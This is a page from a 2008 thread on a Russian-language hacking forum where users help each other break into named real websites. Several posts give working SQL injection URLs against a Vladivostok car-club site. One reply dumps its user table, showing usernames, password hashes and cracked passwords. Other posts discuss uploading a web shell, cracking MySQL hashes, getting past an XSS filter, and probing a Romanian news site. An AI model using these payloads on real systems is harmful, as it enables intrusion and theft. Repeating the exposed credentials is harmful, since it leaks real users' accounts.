HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 229 из 2422 « Первая < 129179219 225 226 227 228 229 230 231 232 233 2392793297291229 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.06.2008, 18:39
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Цитата:
Сообщение от n0ne  
Велемир,


3. Если file_priv = 1, попробуй залить шелл одним из множества способов. Также если у тебя есть доступ к mysql.user, то можно попробовать расшифровать хэш и залогиница в базу, но стоит это делать при условии что доступ разрешен не только localhost, а это бывает достаточно редко
Я ж грю,что шелл не могу залить,ибо путь не знаю =_=.Хеши у мя есть,расшифровал не все,а как зайти в бд ниипу,ибо нету привычной мне phpmyadmin =________________________=.Порт открытый,как я уже сказал,есть - (3306).КАК и ЧЕМ залогиница я не знаю =_=,ибо никогда такого не делал.
 
Ответить с цитированием

  #2  
Старый 12.06.2008, 04:14
zavra
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928

Репутация: 137
По умолчанию
Возможли ли как-то реализовать хсску, если фильтр намертво отрезает все, что в <> и их самих тоже. варианты типа <<><><<<>as<a>><<sa>> пробовал, тупо ищет отрывающуюся закрывающуюся кавычки и стирает.
" преобразует в &quot; разрешены теги <b> <i> <li>, это не форум.
Последний раз редактировалось zavra; 12.06.2008 в 04:29..
 
Ответить с цитированием

  #3  
Старый 12.06.2008, 08:34
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


По умолчанию
Если там не тоит

<meta http-equiv="Content-Type" content="text/html; charset=кодировка>

можно попробовть сделать это через юникод

например как тут

http://forum.antichat.ru/showpost.php?p=658326&postcount=16
 
Ответить с цитированием

  #4  
Старый 15.06.2008, 20:04
zavra
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928

Репутация: 137
По умолчанию
Цитата:
Сообщение от Doom123  
Если там не тоит

<meta http-equiv="Content-Type" content="text/html; charset=кодировка>

можно попробовть сделать это через юникод

например как тут

http://forum.antichat.ru/showpost.php?p=658326&postcount=16
стоит
 
Ответить с цитированием

  #5  
Старый 12.06.2008, 09:52
bsdal
Новичок
Регистрация: 07.03.2008
Сообщений: 2
Провел на форуме:
37935

Репутация: 0
По умолчанию
Помогите плииз.
Код:
http://www.wrx-vladivostok.ru/news.php?id=100+and+1=0+UNION+SELECT+1,2,3/*
matriza@localhost
matriza_wrxvlad
5.0.27-standard-log
Получил структуру базы данных через INFORMATION_SCHEMA.TABLES, но не могу вывести информацию из самой базы.
*
Код:
http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+TABLE_NAME,2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1/*
16: userlist
16.1: name
16.2: pass
 
Ответить с цитированием

  #6  
Старый 12.06.2008, 11:06
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
По умолчанию
Цитата:
Сообщение от bsdal  
Помогите плииз.
http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+concat_ws(CHAR(45),%60n ame%60,pass),2,3+FROM+matriza.userlist+LIMIT+2,1/*

user-827ccb0eea8a706c4c34a16891f84e7b
827ccb0eea8a706c4c34a16891f84e7b = 12345

customer1-dc5c7986daef50c1e02ab09b442ee34f
dc5c7986daef50c1e02ab09b442ee34f = 001
Последний раз редактировалось z3r0cool; 12.06.2008 в 11:12..
 
Ответить с цитированием

  #7  
Старый 12.06.2008, 11:39
bsdal
Новичок
Регистрация: 07.03.2008
Сообщений: 2
Провел на форуме:
37935

Репутация: 0
По умолчанию
большое спасибо, принцип понял
 
Ответить с цитированием

  #8  
Старый 12.06.2008, 15:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
http://stiri.rol.ro/content/view/129717/-3'+group+by+1/*/

а дальше хз че делать..у кого какие предложения?
 
Ответить с цитированием

  #9  
Старый 12.06.2008, 16:25
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию
уверен что это скуль..?)
Последний раз редактировалось sabe; 12.06.2008 в 22:17..
 
Ответить с цитированием

  #10  
Старый 12.06.2008, 22:23
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 sabe
Цитата:
Сообщение от sabe  
уверен что это скуль..?)
 
Ответить с цитированием
Ответ
Страница 229 из 2422 « Первая < 129179219 225 226 227 228 229 230 231 232 233 2392793297291229 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.